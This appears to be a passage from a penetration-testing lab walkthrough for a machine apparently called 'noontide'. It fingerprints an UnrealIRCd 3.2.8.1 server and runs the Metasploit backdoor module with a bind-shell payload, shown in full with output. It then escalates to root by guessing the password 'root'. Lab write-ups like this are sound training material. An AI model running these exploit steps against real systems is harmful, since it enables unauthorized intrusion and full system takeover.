We’ll use irssi here but any other IRC client will do.

kali@kali:~$ irssi

[(status)] /server connect 192.168.187.120

11:11 -!- Irssi: Looking up 192.168.187.120
11:11 -!- Irssi: Connecting to 192.168.187.120 [192.168.120.165] port 6667
11:11 -!- Irssi: Connection to 192.168.187.120 established
11:11 !irc.foonet.com *** Looking up your hostname...
11:11 !irc.foonet.com *** Couldn't resolve your hostname; using your IP address instead
11:11 -!- You have not registered
11:11 -!- Welcome to the ROXnet IRC Network kali!kali@192.168.118.9
11:11 -!- Your host is irc.foonet.com, running version Unreal3.2.8.1
11:11 -!- This server was created Sat 08 Aug EDT at 2020 07:03:52 PM
11:11 -!- irc.foonet.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
11:11 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 are supported by this server
11:11 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT
STATUSMSG=~&@%+ are supported by this server
11:11 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
11:11 -!- There are 1 users and 0 invisible on 1 servers
11:11 -!- I have 1 clients and 0 servers
11:11 -!- Current Local Users: 1 Max: 1
11:11 -!- Current Global Users: 1 Max: 1
11:11 -!- MOTD File is missing
11:11 -!- Mode change [+iwx] for user kali`

We see that the IRC server is Unreal version 3.2.8.1
Exploitation
Remote Code Execution

Looking up exploits for this version, we find that it is vulnerable to remote code execution:

kali@kali:~$ searchsploit “3.2.8.1”

Exploit Title | Path

UnrealIRCd 3.2.8.1 – Backdoor Command Execution (Metasploit) | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 – Local Configuration Stack Overflow | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 – Remote Downloader/Execute | linux/remote/13853.pl
—————————————————————————————————————————————————— ———————————

We can use the Metasploit framework module unix/irc/unreal_ircd_3281_backdoor and the payload cmd/unix/reverse_perl to achieve RCE:

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.187.120  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6667             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads

Compatible Payloads
===================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
1 cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
2 cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
3 cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
4 cmd/unix/generic normal No Unix Command, Generic Command Execution
5 cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
6 cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
7 cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
8 cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
9 cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
10 cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
11 cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload 0
payload => cmd/unix/bind_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] 192.168.187.120:6667 - Connected to 192.168.187.120:6667...
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
[*] 192.168.187.120:6667 - Sending backdoor command...
[*] Started bind TCP handler against 192.168.187.120:4444
id
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.187.120:4444) at 2021-09-09 11:23:30 -0400

uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
id
uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
cd /home
su root
root
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux noontide 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
hostname
noontide

.